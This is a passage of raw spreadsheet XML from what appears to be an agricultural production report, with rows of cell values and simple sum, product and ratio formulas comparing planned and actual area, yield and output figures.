        <f t="shared" ref="AI25:AJ25" si="88">AI26/AI24*10</f>
        <v>0</v>
      </c>
      <c r="AJ25" s="11">
        <f t="shared" si="88"/>
        <v>0</v>
      </c>
      <c r="AK25" s="11"/>
      <c r="AL25" s="11">
        <f t="shared" ref="AL25:AM25" si="89">AL26/AL24*10</f>
        <v>0</v>
      </c>
      <c r="AM25" s="11">
        <f t="shared" si="89"/>
        <v>0</v>
      </c>
      <c r="AN25" s="12"/>
      <c r="AO25" s="73"/>
      <c r="AP25" s="74"/>
      <c r="AQ25" s="91"/>
    </row>
    <row r="26" spans="1:43" ht="22.5" customHeight="1">
      <c r="A26" s="68" t="s">
        <v>34</v>
      </c>
      <c r="B26" s="81" t="s">
        <v>12</v>
      </c>
      <c r="C26" s="25" t="s">
        <v>36</v>
      </c>
      <c r="D26" s="89">
        <v>4699</v>
      </c>
      <c r="E26" s="83">
        <f>E30+E34</f>
        <v>4639.8</v>
      </c>
      <c r="F26" s="89">
        <f>F30+F34</f>
        <v>782.4</v>
      </c>
      <c r="G26" s="89">
        <f t="shared" ref="G26:L26" si="90">G30+G34</f>
        <v>923.31999999999994</v>
      </c>
      <c r="H26" s="89">
        <f t="shared" si="90"/>
        <v>675</v>
      </c>
      <c r="I26" s="89">
        <f t="shared" si="90"/>
        <v>812.1</v>
      </c>
      <c r="J26" s="89">
        <f t="shared" si="90"/>
        <v>879.6</v>
      </c>
      <c r="K26" s="89">
        <f t="shared" si="90"/>
        <v>222.16</v>
      </c>
      <c r="L26" s="89">
        <f t="shared" si="90"/>
        <v>317.8</v>
      </c>
      <c r="M26" s="85"/>
      <c r="N26" s="98">
        <f>N30+N34</f>
        <v>794.3</v>
      </c>
      <c r="O26" s="86">
        <f>R26+V26+Z26+AD26+AG26+AJ26+AM26</f>
        <v>0</v>
      </c>
      <c r="P26" s="11">
        <f t="shared" ref="P26" si="91">P30+P34</f>
        <v>794.3</v>
      </c>
      <c r="Q26" s="12">
        <v>782.4</v>
      </c>
      <c r="R26" s="87">
        <f>R30+R34</f>
        <v>0</v>
      </c>
      <c r="S26" s="12"/>
      <c r="T26" s="11">
        <f t="shared" ref="T26" si="92">T30+T34</f>
        <v>0</v>
      </c>
      <c r="U26" s="12">
        <v>923.31999999999994</v>
      </c>
      <c r="V26" s="87">
        <f t="shared" ref="V26:X26" si="93">V30+V34</f>
        <v>0</v>
      </c>
      <c r="W26" s="12"/>
      <c r="X26" s="11">
        <f t="shared" si="93"/>
        <v>0</v>
      </c>
      <c r="Y26" s="12">
        <v>675</v>
      </c>
      <c r="Z26" s="87">
        <f t="shared" ref="Z26:AB26" si="94">Z30+Z34</f>
        <v>0</v>
      </c>
      <c r="AA26" s="12"/>
      <c r="AB26" s="11">
        <f t="shared" si="94"/>
        <v>0</v>
      </c>
      <c r="AC26" s="12"/>
      <c r="AD26" s="87">
        <f t="shared" ref="AD26:AF26" si="95">AD30+AD34</f>
        <v>0</v>
      </c>
      <c r="AE26" s="12"/>
      <c r="AF26" s="11">
        <f t="shared" si="95"/>
        <v>0</v>
      </c>
      <c r="AG26" s="87">
        <f t="shared" ref="AG26:AI26" si="96">AG30+AG34</f>
        <v>0</v>
      </c>
      <c r="AH26" s="12"/>
      <c r="AI26" s="11">
        <f t="shared" si="96"/>
        <v>0</v>
      </c>
      <c r="AJ26" s="87">
        <f t="shared" ref="AJ26:AL26" si="97">AJ30+AJ34</f>
        <v>0</v>
      </c>
      <c r="AK26" s="12"/>
      <c r="AL26" s="11">
        <f t="shared" si="97"/>
        <v>0</v>
      </c>
      <c r="AM26" s="87">
        <f t="shared" ref="AM26" si="98">AM30+AM34</f>
        <v>0</v>
      </c>
      <c r="AN26" s="87"/>
      <c r="AO26" s="73"/>
      <c r="AP26" s="74"/>
      <c r="AQ26" s="91"/>
    </row>
    <row r="27" spans="1:43" ht="22.5" customHeight="1">
      <c r="A27" s="68" t="s">
        <v>67</v>
      </c>
      <c r="B27" s="101" t="s">
        <v>37</v>
      </c>
      <c r="C27" s="25" t="s">
        <v>39</v>
      </c>
      <c r="D27" s="82"/>
      <c r="E27" s="71"/>
      <c r="F27" s="89"/>
      <c r="G27" s="89"/>
      <c r="H27" s="89"/>
      <c r="I27" s="89"/>
      <c r="J27" s="89"/>
      <c r="K27" s="89"/>
      <c r="L27" s="89"/>
      <c r="M27" s="85"/>
      <c r="N27" s="98"/>
      <c r="O27" s="73"/>
      <c r="P27" s="11"/>
      <c r="Q27" s="12"/>
      <c r="R27" s="87"/>
      <c r="S27" s="12"/>
      <c r="T27" s="11"/>
      <c r="U27" s="12"/>
      <c r="V27" s="87"/>
      <c r="W27" s="12"/>
      <c r="X27" s="11"/>
      <c r="Y27" s="12"/>
      <c r="Z27" s="87"/>
      <c r="AA27" s="12"/>
      <c r="AB27" s="11"/>
      <c r="AC27" s="12"/>
      <c r="AD27" s="87"/>
      <c r="AE27" s="12"/>
      <c r="AF27" s="11"/>
      <c r="AG27" s="87"/>
      <c r="AH27" s="12"/>
      <c r="AI27" s="11"/>
      <c r="AJ27" s="87"/>
      <c r="AK27" s="12"/>
      <c r="AL27" s="11"/>
      <c r="AM27" s="87"/>
      <c r="AN27" s="87"/>
      <c r="AO27" s="73"/>
      <c r="AP27" s="74"/>
      <c r="AQ27" s="91"/>
    </row>
    <row r="28" spans="1:43" ht="22.5" customHeight="1">
      <c r="A28" s="68" t="s">
        <v>34</v>
      </c>
      <c r="B28" s="81" t="s">
        <v>10</v>
      </c>
      <c r="C28" s="25" t="s">
        <v>1</v>
      </c>
      <c r="D28" s="89">
        <v>637</v>
      </c>
      <c r="E28" s="83">
        <v>639</v>
      </c>
      <c r="F28" s="89">
        <v>119</v>
      </c>
      <c r="G28" s="89">
        <v>148</v>
      </c>
      <c r="H28" s="89">
        <v>75</v>
      </c>
      <c r="I28" s="89">
        <v>99</v>
      </c>
      <c r="J28" s="89">
        <v>120</v>
      </c>
      <c r="K28" s="89">
        <v>31.9</v>
      </c>
      <c r="L28" s="89">
        <v>42</v>
      </c>
      <c r="M28" s="85">
        <v>639.4</v>
      </c>
      <c r="N28" s="98">
        <f>P28+T28+X28+AB28+AF28+AI28+AL28</f>
        <v>634.9</v>
      </c>
      <c r="O28" s="86">
        <f>R28+V28+Z28+AD28+AG28+AJ28+AM28</f>
        <v>634.9</v>
      </c>
      <c r="P28" s="11">
        <v>119</v>
      </c>
      <c r="Q28" s="12">
        <v>119</v>
      </c>
      <c r="R28" s="87">
        <v>119</v>
      </c>
      <c r="S28" s="33">
        <f>R28-Q28</f>
        <v>0</v>
      </c>
      <c r="T28" s="11">
        <v>148</v>
      </c>
      <c r="U28" s="12">
        <v>148</v>
      </c>
      <c r="V28" s="87">
        <v>148</v>
      </c>
      <c r="W28" s="12"/>
      <c r="X28" s="11">
        <v>75</v>
      </c>
      <c r="Y28" s="12">
        <v>75</v>
      </c>
      <c r="Z28" s="87">
        <v>75</v>
      </c>
      <c r="AA28" s="12"/>
      <c r="AB28" s="11">
        <v>99</v>
      </c>
      <c r="AC28" s="12"/>
      <c r="AD28" s="87">
        <v>99</v>
      </c>
      <c r="AE28" s="12"/>
      <c r="AF28" s="11">
        <v>120</v>
      </c>
      <c r="AG28" s="87">
        <v>120</v>
      </c>
      <c r="AH28" s="12"/>
      <c r="AI28" s="11">
        <v>31.9</v>
      </c>
      <c r="AJ28" s="87">
        <v>31.9</v>
      </c>
      <c r="AK28" s="12"/>
      <c r="AL28" s="11">
        <v>42</v>
      </c>
      <c r="AM28" s="87">
        <v>42</v>
      </c>
      <c r="AN28" s="87"/>
      <c r="AO28" s="73">
        <f>O28/N28*100</f>
        <v>100</v>
      </c>
      <c r="AP28" s="74">
        <f>O28-M28</f>
        <v>-4.5</v>
      </c>
      <c r="AQ28" s="91"/>
    </row>
    <row r="29" spans="1:43" ht="22.5" customHeight="1">
      <c r="A29" s="68" t="s">
        <v>35</v>
      </c>
      <c r="B29" s="81" t="s">
        <v>11</v>
      </c>
      <c r="C29" s="25" t="s">
        <v>2</v>
      </c>
      <c r="D29" s="89">
        <v>62</v>
      </c>
      <c r="E29" s="83">
        <f>E30/E28*10</f>
        <v>61.813771517996869</v>
      </c>
      <c r="F29" s="89">
        <v>60</v>
      </c>
      <c r="G29" s="89">
        <v>61</v>
      </c>
      <c r="H29" s="89">
        <v>58</v>
      </c>
      <c r="I29" s="89">
        <v>59</v>
      </c>
      <c r="J29" s="89">
        <v>70</v>
      </c>
      <c r="K29" s="89">
        <v>64</v>
      </c>
      <c r="L29" s="89">
        <v>59</v>
      </c>
      <c r="M29" s="85"/>
      <c r="N29" s="98">
        <f>N30/N28*10</f>
        <v>11.433296582138919</v>
      </c>
      <c r="O29" s="98">
        <f>O30/O28*10</f>
        <v>0</v>
      </c>
      <c r="P29" s="11">
        <v>61</v>
      </c>
      <c r="Q29" s="12">
        <v>60</v>
      </c>
      <c r="R29" s="87"/>
      <c r="S29" s="12"/>
      <c r="T29" s="11"/>
      <c r="U29" s="12"/>
      <c r="V29" s="87"/>
      <c r="W29" s="12"/>
      <c r="X29" s="11"/>
      <c r="Y29" s="12"/>
      <c r="Z29" s="87"/>
      <c r="AA29" s="12"/>
      <c r="AB29" s="11"/>
      <c r="AC29" s="12"/>
      <c r="AD29" s="87"/>
      <c r="AE29" s="12"/>
      <c r="AF29" s="11"/>
      <c r="AG29" s="87"/>
      <c r="AH29" s="12"/>
      <c r="AI29" s="11"/>
      <c r="AJ29" s="87"/>
      <c r="AK29" s="12"/>
      <c r="AL29" s="11"/>
      <c r="AM29" s="87"/>
      <c r="AN29" s="87"/>
      <c r="AO29" s="73"/>
      <c r="AP29" s="74"/>
      <c r="AQ29" s="91"/>
    </row>
    <row r="30" spans="1:43" ht="22.5" customHeight="1">
      <c r="A30" s="68" t="s">
        <v>34</v>
      </c>
      <c r="B30" s="81" t="s">
        <v>12</v>
      </c>
      <c r="C30" s="25" t="s">
        <v>36</v>
      </c>
      <c r="D30" s="89">
        <v>3953</v>
      </c>
      <c r="E30" s="83">
        <v>3949.9</v>
      </c>
      <c r="F30" s="89">
        <f>F29*F28/10</f>
        <v>714</v>
      </c>
      <c r="G30" s="89">
        <f t="shared" ref="G30:L30" si="99">G29*G28/10</f>
        <v>902.8</v>
      </c>
      <c r="H30" s="89">
        <f t="shared" si="99"/>
        <v>435</v>
      </c>
      <c r="I30" s="89">
        <f t="shared" si="99"/>
        <v>584.1</v>
      </c>
      <c r="J30" s="89">
        <f t="shared" si="99"/>
        <v>840</v>
      </c>
      <c r="K30" s="89">
        <f t="shared" si="99"/>
        <v>204.16</v>
      </c>
      <c r="L30" s="89">
        <f t="shared" si="99"/>
        <v>247.8</v>
      </c>
      <c r="M30" s="85"/>
      <c r="N30" s="98">
        <f>P30+T30+X30+AB30+AF30+AI30+AL30</f>
        <v>725.9</v>
      </c>
      <c r="O30" s="86">
        <f>R30+V30+Z30+AD30+AG30+AJ30+AM30</f>
        <v>0</v>
      </c>
      <c r="P30" s="11">
        <f t="shared" ref="P30" si="100">P29*P28/10</f>
        <v>725.9</v>
      </c>
      <c r="Q30" s="12">
        <v>714</v>
      </c>
      <c r="R30" s="87"/>
      <c r="S30" s="12"/>
      <c r="T30" s="11"/>
      <c r="U30" s="12"/>
      <c r="V30" s="87"/>
      <c r="W30" s="12"/>
      <c r="X30" s="11"/>
      <c r="Y30" s="12"/>
      <c r="Z30" s="87"/>
      <c r="AA30" s="12"/>
      <c r="AB30" s="11"/>
      <c r="AC30" s="12"/>
      <c r="AD30" s="87"/>
      <c r="AE30" s="12"/>
      <c r="AF30" s="11"/>
      <c r="AG30" s="87"/>
      <c r="AH30" s="12"/>
      <c r="AI30" s="11"/>
      <c r="AJ30" s="87"/>
      <c r="AK30" s="12"/>
      <c r="AL30" s="11"/>
      <c r="AM30" s="87"/>
      <c r="AN30" s="87"/>
      <c r="AO30" s="73"/>
      <c r="AP30" s="74"/>
      <c r="AQ30" s="91"/>
    </row>
    <row r="31" spans="1:43" ht="22.5" customHeight="1">
      <c r="A31" s="68" t="s">
        <v>68</v>
      </c>
      <c r="B31" s="101" t="s">
        <v>64</v>
      </c>
      <c r="C31" s="25" t="s">
        <v>39</v>
      </c>
      <c r="D31" s="82"/>
      <c r="E31" s="71"/>
      <c r="F31" s="89"/>
      <c r="G31" s="89"/>
      <c r="H31" s="89"/>
      <c r="I31" s="89"/>
      <c r="J31" s="89"/>
      <c r="K31" s="89"/>
      <c r="L31" s="89"/>
      <c r="M31" s="85"/>
      <c r="N31" s="98"/>
      <c r="O31" s="73"/>
      <c r="P31" s="11"/>
      <c r="Q31" s="12"/>
      <c r="R31" s="87"/>
      <c r="S31" s="12"/>
      <c r="T31" s="11"/>
      <c r="U31" s="12"/>
      <c r="V31" s="87"/>
      <c r="W31" s="12"/>
      <c r="X31" s="11"/>
      <c r="Y31" s="12"/>
      <c r="Z31" s="87"/>
      <c r="AA31" s="12"/>
      <c r="AB31" s="11"/>
      <c r="AC31" s="12"/>
      <c r="AD31" s="87"/>
      <c r="AE31" s="12"/>
      <c r="AF31" s="11"/>
      <c r="AG31" s="87"/>
      <c r="AH31" s="12"/>
      <c r="AI31" s="11"/>
      <c r="AJ31" s="87"/>
      <c r="AK31" s="12"/>
      <c r="AL31" s="11"/>
      <c r="AM31" s="87"/>
      <c r="AN31" s="87"/>
      <c r="AO31" s="73"/>
      <c r="AP31" s="74"/>
      <c r="AQ31" s="91"/>
    </row>
    <row r="32" spans="1:43" ht="22.5" customHeight="1">
      <c r="A32" s="68" t="s">
        <v>34</v>
      </c>
      <c r="B32" s="81" t="s">
        <v>10</v>
      </c>
      <c r="C32" s="25" t="s">
        <v>1</v>
      </c>
      <c r="D32" s="89">
        <v>376</v>
      </c>
      <c r="E32" s="83">
        <v>352</v>
      </c>
      <c r="F32" s="89">
        <v>36</v>
      </c>
      <c r="G32" s="89">
        <v>10.8</v>
      </c>
      <c r="H32" s="89">
        <v>120</v>
      </c>
      <c r="I32" s="89">
        <v>114</v>
      </c>
      <c r="J32" s="89">
        <v>22</v>
      </c>
      <c r="K32" s="89">
        <v>10</v>
      </c>
      <c r="L32" s="89">
        <v>35</v>
      </c>
      <c r="M32" s="85">
        <v>347.8</v>
      </c>
      <c r="N32" s="98">
        <f>P32+T32+X32+AB32+AF32+AI32+AL32</f>
        <v>347.8</v>
      </c>
      <c r="O32" s="86">
        <f>R32+V32+Z32+AD32+AG32+AJ32+AM32</f>
        <v>347.8</v>
      </c>
      <c r="P32" s="11">
        <v>36</v>
      </c>
      <c r="Q32" s="12">
        <v>36</v>
      </c>
      <c r="R32" s="87">
        <v>36</v>
      </c>
      <c r="S32" s="12"/>
      <c r="T32" s="11">
        <v>10.8</v>
      </c>
      <c r="U32" s="12">
        <v>10.8</v>
      </c>
      <c r="V32" s="87">
        <v>10.8</v>
      </c>
      <c r="W32" s="12"/>
      <c r="X32" s="11">
        <v>120</v>
      </c>
      <c r="Y32" s="12">
        <v>120</v>
      </c>
      <c r="Z32" s="87">
        <v>120</v>
      </c>
      <c r="AA32" s="12"/>
      <c r="AB32" s="11">
        <v>114</v>
      </c>
      <c r="AC32" s="12"/>
      <c r="AD32" s="87">
        <v>114</v>
      </c>
      <c r="AE32" s="12"/>
      <c r="AF32" s="11">
        <v>22</v>
      </c>
      <c r="AG32" s="87">
        <v>22</v>
      </c>
      <c r="AH32" s="12"/>
      <c r="AI32" s="11">
        <v>10</v>
      </c>
      <c r="AJ32" s="87">
        <v>10</v>
      </c>
      <c r="AK32" s="12"/>
      <c r="AL32" s="11">
        <v>35</v>
      </c>
      <c r="AM32" s="87">
        <v>35</v>
      </c>
      <c r="AN32" s="87"/>
      <c r="AO32" s="87"/>
      <c r="AP32" s="74">
        <f>O32-M32</f>
        <v>0</v>
      </c>
      <c r="AQ32" s="91"/>
    </row>
    <row r="33" spans="1:43" ht="22.5" customHeight="1">
      <c r="A33" s="68" t="s">
        <v>35</v>
      </c>
      <c r="B33" s="81" t="s">
        <v>11</v>
      </c>
      <c r="C33" s="25" t="s">
        <v>2</v>
      </c>
      <c r="D33" s="89">
        <v>20</v>
      </c>
      <c r="E33" s="83">
        <f>E34/E32*10</f>
        <v>19.59943181818182</v>
      </c>
      <c r="F33" s="89">
        <v>19</v>
      </c>
      <c r="G33" s="89">
        <v>19</v>
      </c>
      <c r="H33" s="89">
        <v>20</v>
      </c>
      <c r="I33" s="89">
        <v>20</v>
      </c>
      <c r="J33" s="89">
        <v>18</v>
      </c>
      <c r="K33" s="89">
        <v>18</v>
      </c>
      <c r="L33" s="89">
        <v>20</v>
      </c>
      <c r="M33" s="85"/>
      <c r="N33" s="98">
        <f>N34/N32*10</f>
        <v>1.9666474985623923</v>
      </c>
      <c r="O33" s="87">
        <f>O34/O32*10</f>
        <v>0</v>
      </c>
      <c r="P33" s="11">
        <v>19</v>
      </c>
      <c r="Q33" s="12">
        <v>19</v>
      </c>
      <c r="R33" s="87"/>
      <c r="S33" s="12"/>
      <c r="T33" s="11"/>
      <c r="U33" s="12"/>
      <c r="V33" s="87"/>
      <c r="W33" s="12"/>
      <c r="X33" s="11"/>
      <c r="Y33" s="12"/>
      <c r="Z33" s="87"/>
      <c r="AA33" s="12"/>
      <c r="AB33" s="11"/>
      <c r="AC33" s="12"/>
      <c r="AD33" s="87"/>
      <c r="AE33" s="12"/>
      <c r="AF33" s="11"/>
      <c r="AG33" s="87"/>
      <c r="AH33" s="12"/>
      <c r="AI33" s="11"/>
      <c r="AJ33" s="87"/>
      <c r="AK33" s="12"/>
      <c r="AL33" s="11"/>
      <c r="AM33" s="87"/>
      <c r="AN33" s="87"/>
      <c r="AO33" s="87"/>
      <c r="AP33" s="74"/>
      <c r="AQ33" s="91"/>
    </row>
    <row r="34" spans="1:43" ht="22.5" customHeight="1">
      <c r="A34" s="68" t="s">
        <v>34</v>
      </c>
      <c r="B34" s="81" t="s">
        <v>12</v>
      </c>
      <c r="C34" s="25" t="s">
        <v>36</v>
      </c>
      <c r="D34" s="89">
        <v>746</v>
      </c>
      <c r="E34" s="83">
        <v>689.9</v>
      </c>
      <c r="F34" s="89">
        <f>F33*F32/10</f>
        <v>68.400000000000006</v>
      </c>
      <c r="G34" s="89">
        <f t="shared" ref="G34:L34" si="101">G33*G32/10</f>
        <v>20.520000000000003</v>
      </c>
      <c r="H34" s="89">
        <f t="shared" si="101"/>
        <v>240</v>
      </c>
      <c r="I34" s="89">
        <f t="shared" si="101"/>
        <v>228</v>
      </c>
      <c r="J34" s="89">
        <f t="shared" si="101"/>
        <v>39.6</v>
      </c>
      <c r="K34" s="89">
        <f t="shared" si="101"/>
        <v>18</v>
      </c>
      <c r="L34" s="89">
        <f t="shared" si="101"/>
        <v>70</v>
      </c>
      <c r="M34" s="85"/>
      <c r="N34" s="98">
        <f>P34+T34+X34+AB34+AF34+AI34+AL34</f>
        <v>68.400000000000006</v>
      </c>
      <c r="O34" s="86">
        <f>R34+V34+Z34+AD34+AG34+AJ34+AM34</f>
        <v>0</v>
      </c>
      <c r="P34" s="11">
        <f t="shared" ref="P34" si="102">P33*P32/10</f>
        <v>68.400000000000006</v>
      </c>
      <c r="Q34" s="12">
        <v>68.400000000000006</v>
      </c>
      <c r="R34" s="87"/>
      <c r="S34" s="12"/>
      <c r="T34" s="11"/>
      <c r="U34" s="12"/>
      <c r="V34" s="87"/>
      <c r="W34" s="12"/>
      <c r="X34" s="11"/>
      <c r="Y34" s="12"/>
      <c r="Z34" s="87"/>
      <c r="AA34" s="12"/>
      <c r="AB34" s="11"/>
      <c r="AC34" s="12"/>
      <c r="AD34" s="87"/>
      <c r="AE34" s="12"/>
      <c r="AF34" s="11"/>
      <c r="AG34" s="87"/>
      <c r="AH34" s="12"/>
      <c r="AI34" s="11"/>
      <c r="AJ34" s="87"/>
      <c r="AK34" s="12"/>
      <c r="AL34" s="11"/>
      <c r="AM34" s="87"/>
      <c r="AN34" s="87"/>
      <c r="AO34" s="87"/>
      <c r="AP34" s="74"/>
      <c r="AQ34" s="91"/>
    </row>
    <row r="35" spans="1:43" ht="22.5" customHeight="1">
      <c r="A35" s="76">
        <v>2</v>
      </c>
      <c r="B35" s="24" t="s">
        <v>65</v>
      </c>
      <c r="C35" s="25" t="s">
        <v>39</v>
      </c>
      <c r="D35" s="89"/>
      <c r="E35" s="71"/>
      <c r="F35" s="89"/>
      <c r="G35" s="89"/>
      <c r="H35" s="89"/>
      <c r="I35" s="89"/>
      <c r="J35" s="89"/>
      <c r="K35" s="89"/>
      <c r="L35" s="89"/>
      <c r="M35" s="85"/>
      <c r="N35" s="98"/>
      <c r="O35" s="73"/>
      <c r="P35" s="11"/>
      <c r="Q35" s="12"/>
      <c r="R35" s="87"/>
      <c r="S35" s="12"/>
      <c r="T35" s="11"/>
      <c r="U35" s="12"/>
      <c r="V35" s="87"/>
      <c r="W35" s="12"/>
      <c r="X35" s="11"/>
      <c r="Y35" s="12"/>
      <c r="Z35" s="87"/>
      <c r="AA35" s="12"/>
      <c r="AB35" s="11"/>
      <c r="AC35" s="12"/>
      <c r="AD35" s="87"/>
      <c r="AE35" s="12"/>
      <c r="AF35" s="11"/>
      <c r="AG35" s="87"/>
      <c r="AH35" s="12"/>
      <c r="AI35" s="11"/>
      <c r="AJ35" s="87"/>
      <c r="AK35" s="12"/>
      <c r="AL35" s="11"/>
      <c r="AM35" s="87"/>
      <c r="AN35" s="87"/>
      <c r="AO35" s="87"/>
      <c r="AP35" s="74"/>
      <c r="AQ35" s="91"/>
    </row>
    <row r="36" spans="1:43" ht="22.5" customHeight="1">
      <c r="A36" s="68" t="s">
        <v>34</v>
      </c>
      <c r="B36" s="81" t="s">
        <v>10</v>
      </c>
      <c r="C36" s="25" t="s">
        <v>1</v>
      </c>
      <c r="D36" s="89">
        <v>777</v>
      </c>
      <c r="E36" s="83">
        <f>E39+E43+E47</f>
        <v>783.5</v>
      </c>
      <c r="F36" s="89">
        <f t="shared" ref="F36:L36" si="103">F39+F43+F47</f>
        <v>140</v>
      </c>
      <c r="G36" s="89">
        <f t="shared" si="103"/>
        <v>131</v>
      </c>
      <c r="H36" s="89">
        <f t="shared" si="103"/>
        <v>68.5</v>
      </c>
      <c r="I36" s="89">
        <f t="shared" si="103"/>
        <v>92</v>
      </c>
      <c r="J36" s="89">
        <f t="shared" si="103"/>
        <v>132</v>
      </c>
      <c r="K36" s="89">
        <f t="shared" si="103"/>
        <v>46</v>
      </c>
      <c r="L36" s="89">
        <f t="shared" si="103"/>
        <v>174</v>
      </c>
      <c r="M36" s="85">
        <f>M43+M39+M47</f>
        <v>783.5</v>
      </c>
      <c r="N36" s="192">
        <f>N39+N43+N47</f>
        <v>783.5</v>
      </c>
      <c r="O36" s="86">
        <f>O39+O43+O47</f>
        <v>783.5</v>
      </c>
      <c r="P36" s="11">
        <f t="shared" ref="P36" si="104">P39+P43+P47</f>
        <v>140</v>
      </c>
      <c r="Q36" s="12">
        <v>140</v>
      </c>
      <c r="R36" s="87">
        <f t="shared" ref="R36:T36" si="105">R39+R43+R47</f>
        <v>140</v>
      </c>
      <c r="S36" s="33">
        <f>R36-Q36</f>
        <v>0</v>
      </c>
      <c r="T36" s="11">
        <f t="shared" si="105"/>
        <v>131</v>
      </c>
      <c r="U36" s="12">
        <v>131</v>
      </c>
      <c r="V36" s="87">
        <f t="shared" ref="V36:X36" si="106">V39+V43+V47</f>
        <v>131</v>
      </c>
      <c r="W36" s="12"/>
      <c r="X36" s="11">
        <f t="shared" si="106"/>
        <v>68.5</v>
      </c>
      <c r="Y36" s="12">
        <v>68.5</v>
      </c>
      <c r="Z36" s="87">
        <f t="shared" ref="Z36:AB36" si="107">Z39+Z43+Z47</f>
        <v>68.5</v>
      </c>
      <c r="AA36" s="12"/>
      <c r="AB36" s="11">
        <f t="shared" si="107"/>
        <v>92</v>
      </c>
      <c r="AC36" s="12"/>
      <c r="AD36" s="87">
        <f t="shared" ref="AD36:AF36" si="108">AD39+AD43+AD47</f>
        <v>92</v>
      </c>
      <c r="AE36" s="12"/>
      <c r="AF36" s="11">
        <f t="shared" si="108"/>
        <v>132</v>
      </c>
      <c r="AG36" s="87">
        <f t="shared" ref="AG36:AI36" si="109">AG39+AG43+AG47</f>
        <v>132</v>
      </c>
      <c r="AH36" s="12"/>
      <c r="AI36" s="11">
        <f t="shared" si="109"/>
        <v>46</v>
      </c>
      <c r="AJ36" s="87">
        <f t="shared" ref="AJ36:AL36" si="110">AJ39+AJ43+AJ47</f>
        <v>46</v>
      </c>
      <c r="AK36" s="12"/>
      <c r="AL36" s="11">
        <f t="shared" si="110"/>
        <v>174</v>
      </c>
      <c r="AM36" s="87">
        <f t="shared" ref="AM36" si="111">AM39+AM43+AM47</f>
        <v>174</v>
      </c>
      <c r="AN36" s="87"/>
      <c r="AO36" s="73">
        <f>O36/N36*100</f>
        <v>100</v>
      </c>
      <c r="AP36" s="74">
        <f>O36-M36</f>
        <v>0</v>
      </c>
      <c r="AQ36" s="91"/>
    </row>
    <row r="37" spans="1:43" ht="22.5" customHeight="1">
      <c r="A37" s="68" t="s">
        <v>35</v>
      </c>
      <c r="B37" s="81" t="s">
        <v>11</v>
      </c>
      <c r="C37" s="25" t="s">
        <v>2</v>
      </c>
      <c r="D37" s="89">
        <v>59</v>
      </c>
      <c r="E37" s="83">
        <f>E38/E36*10</f>
        <v>58.442884492661136</v>
      </c>
      <c r="F37" s="89"/>
      <c r="G37" s="89"/>
      <c r="H37" s="89">
        <f>H38/H36*10</f>
        <v>55.605839416058387</v>
      </c>
      <c r="I37" s="89">
        <f>I38/I36*10</f>
        <v>60.5</v>
      </c>
      <c r="J37" s="89"/>
      <c r="K37" s="89"/>
      <c r="L37" s="89"/>
      <c r="M37" s="90">
        <f>M38/M36*10</f>
        <v>47.734524569240584</v>
      </c>
      <c r="N37" s="193">
        <f>N38/N36*10</f>
        <v>49.164007657945128</v>
      </c>
      <c r="O37" s="86">
        <f>O38/O36*10</f>
        <v>49.456873005743454</v>
      </c>
      <c r="P37" s="11">
        <f>P38/P36*10</f>
        <v>55.885714285714279</v>
      </c>
      <c r="Q37" s="11"/>
      <c r="R37" s="11">
        <f>R38/R36*10</f>
        <v>50.042857142857144</v>
      </c>
      <c r="S37" s="11"/>
      <c r="T37" s="11">
        <f t="shared" ref="T37:V37" si="112">T38/T36*10</f>
        <v>44.381679389312971</v>
      </c>
      <c r="U37" s="11"/>
      <c r="V37" s="11">
        <f t="shared" si="112"/>
        <v>48.897709923664117</v>
      </c>
      <c r="W37" s="11"/>
      <c r="X37" s="11">
        <f t="shared" ref="X37" si="113">X38/X36*10</f>
        <v>43.562043795620433</v>
      </c>
      <c r="Y37" s="12">
        <v>55.605839416058387</v>
      </c>
      <c r="Z37" s="87">
        <f>Z38/Z36*10</f>
        <v>44.67153284671533</v>
      </c>
      <c r="AA37" s="12"/>
      <c r="AB37" s="11">
        <f t="shared" ref="AB37" si="114">AB38/AB36*10</f>
        <v>46.152173913043484</v>
      </c>
      <c r="AC37" s="12"/>
      <c r="AD37" s="87">
        <f>AD38/AD36*10</f>
        <v>46.654347826086962</v>
      </c>
      <c r="AE37" s="12"/>
      <c r="AF37" s="11">
        <f t="shared" ref="AF37:AG37" si="115">AF38/AF36*10</f>
        <v>45.090909090909093</v>
      </c>
      <c r="AG37" s="11">
        <f t="shared" si="115"/>
        <v>46.472727272727269</v>
      </c>
      <c r="AH37" s="11"/>
      <c r="AI37" s="11">
        <f t="shared" ref="AI37:AJ37" si="116">AI38/AI36*10</f>
        <v>46.956521739130437</v>
      </c>
      <c r="AJ37" s="11">
        <f t="shared" si="116"/>
        <v>49.069565217391315</v>
      </c>
      <c r="AK37" s="11"/>
      <c r="AL37" s="11">
        <f t="shared" ref="AL37:AM37" si="117">AL38/AL36*10</f>
        <v>54.827586206896548</v>
      </c>
      <c r="AM37" s="11">
        <f t="shared" si="117"/>
        <v>55.138275862068973</v>
      </c>
      <c r="AN37" s="12"/>
      <c r="AO37" s="87"/>
      <c r="AP37" s="74"/>
      <c r="AQ37" s="91"/>
    </row>
    <row r="38" spans="1:43" ht="22.5" customHeight="1">
      <c r="A38" s="68" t="s">
        <v>34</v>
      </c>
      <c r="B38" s="81" t="s">
        <v>12</v>
      </c>
      <c r="C38" s="25" t="s">
        <v>36</v>
      </c>
      <c r="D38" s="89">
        <v>4551</v>
      </c>
      <c r="E38" s="83">
        <f>E41+E45+E49</f>
        <v>4579</v>
      </c>
      <c r="F38" s="89">
        <f t="shared" ref="F38:L38" si="118">F41+F45+F49</f>
        <v>782.4</v>
      </c>
      <c r="G38" s="89">
        <f t="shared" si="118"/>
        <v>740.9</v>
      </c>
      <c r="H38" s="89">
        <f t="shared" si="118"/>
        <v>380.9</v>
      </c>
      <c r="I38" s="89">
        <f t="shared" si="118"/>
        <v>556.6</v>
      </c>
      <c r="J38" s="89">
        <f t="shared" si="118"/>
        <v>811.2</v>
      </c>
      <c r="K38" s="89">
        <f t="shared" si="118"/>
        <v>270.39999999999998</v>
      </c>
      <c r="L38" s="89">
        <f t="shared" si="118"/>
        <v>1035</v>
      </c>
      <c r="M38" s="85">
        <f>M41+M45</f>
        <v>3740</v>
      </c>
      <c r="N38" s="192">
        <f>N41+N45+N49</f>
        <v>3852.0000000000005</v>
      </c>
      <c r="O38" s="86">
        <f>O41+O45+O49</f>
        <v>3874.9459999999995</v>
      </c>
      <c r="P38" s="11">
        <f t="shared" ref="P38" si="119">P41+P45+P49</f>
        <v>782.4</v>
      </c>
      <c r="Q38" s="12">
        <v>782.4</v>
      </c>
      <c r="R38" s="87">
        <f t="shared" ref="R38:T38" si="120">R41+R45+R49</f>
        <v>700.6</v>
      </c>
      <c r="S38" s="12"/>
      <c r="T38" s="11">
